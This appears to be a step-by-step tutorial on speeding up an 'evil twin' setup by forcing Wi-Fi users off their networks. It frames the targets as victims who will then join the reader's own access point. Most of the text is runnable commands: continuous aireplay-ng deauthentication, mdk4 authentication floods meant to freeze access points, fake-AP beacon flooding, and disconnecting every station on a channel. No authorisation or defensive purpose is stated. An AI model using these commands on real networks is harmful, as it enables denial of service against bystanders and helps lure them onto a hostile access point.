If you have read the previous tutorial Wi-Fi Analysis, you know your Wi-Fi environment around your location. Now you can immediately create an Simple Access Point and wait until the first victims come by themselves. You can also do this process a little faster -> The IEEE 802.11 (Wi-Fi) protocol contains the provision for a deauthentication frames.
The aim of this tutorial is to speed-up the process that stations will connect to the access point (which is created in next tutorial).
You should already have read (and successful carried out) the following tutorials.
Install (or ensure they are installed) following packages.
# update system (optional)
$ sudo apt update -y && sudo apt upgrade -y
# install optional packages (optional)
$ sudo apt install -y vim wireless-tools
# install needed packages
$ sudo apt install -y aircrack-ng mdk4In this tutorial we need the
wlan1interface in the so-called monitor mode. You cannot use thewlan0interface from the Raspberry PI for this.
If you have already set up an Access Point and/or a Captive portal, you should stop them now!
# stop nodogsplash service
$ sudo systemctl stop nodogsplash
# stop hostapd service
$ sudo systemctl stop hostapd
# stop dnsmasq service
$ sudo systemctl stop dnsmasqThe Wi-Fi interface (wlan1) must be set into "monitor mode".
# set interface down
$ sudo ip link set wlan1 down
# turn interface into monitor mode
$ sudo iwconfig wlan1 mode monitor
# set interface up
$ sudo ip link set wlan1 upNote: Read this Wikipedia article to get more information.
The Aircrack-ng suite includes many tools to assess Wi-Fi networks. Here the focus is on aireplay-ng only.
# show help (optional)
$ aireplay-ng --help
# start deauthentication attack
$ sudo aireplay-ng -0 0 -a [mac address] -c [mac address] wlan1-0means, deauthentication mode0means, send continuously deauthentication frames (otherwise you can set a specific number)-a [mac address]means, mac address of the access point-c [mac address]means, mac address of the stationwlan1means, the interface`(in monitor mode)
MDK4 is the successor to MDK3 (but requires the Aircrack-ng). It's an awesome penetration tool for Wi-Fi, but be careful that you don't jam your own connection.
# show help (optional)
$ sudo mdk4 --help
# show detailed help (optional)
$ sudo mdk4 --fullhelpWith this attack mode you send too many authentication frames to all AP's. This can freeze or reset several AP's.
# show help for specific attack mode (optional)
$ sudo mdk4 --help MODE a
# normal attack on specific AP (valid client mac)
$ sudo mdk4 wlan1 a -a [mac address] -m
# intelligent attack on specific AP (valid client mac)
$ sudo mdk4 wlan1 a -i [mac address] -mWith this attack mode you generate fake AP's. You could push the real AP far back, and your AP among the first places.
# show help for specific attack mode (optional)
$ sudo mdk4 --help MODE b
# create fake AP's (without encryption but valid ap mac)
$ sudo mdk4 wlan1 b -w n -m
# create text file
$ vim fake_ssid
# create fake AP's from file (without encryption but valid ap mac)
$ sudo mdk4 wlan1 b -w n -f fake_ssid -mThe content of the file fake_ssid (feel free to change or add other content.).
WuTangLAN
Wi-Fry Chicken
Access Denied
Virus.exe
Connect or Die
For Porn Use Only
Missed Connections
Bathroom Cam
Big Busty Asians
o==[]:::::::::::::::::::::::::>
With this attack mode you deauthenticate stations from there access point. If you AP is ready (and signal is strong) they might connect to you afterwards.
# show help for specific attack mode (optional)
$ sudo mdk4 --help MODE d
# disconnect all stations from all AP's on channel 11
$ sudo mdk4 wlan1 d -c 11MDK4 offers 9 attack modules. Depending on your needs, take also a look at the other!
- ATTACK MODE a: Authentication Denial-Of-Service
- ATTACK MODE b: Beacon Flooding
- ATTACK MODE d: Deauthentication and Disassociation
- ATTACK MODE e: EAPOL Start and Logoff Packet Injection
- ATTACK MODE f: Packet Fuzzer
- ATTACK MODE m: Michael Countermeasures Exploitation
- ATTACK MODE p: SSID Probing and Bruteforcing
- ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
- ATTACK MODE w: WIDS Confusion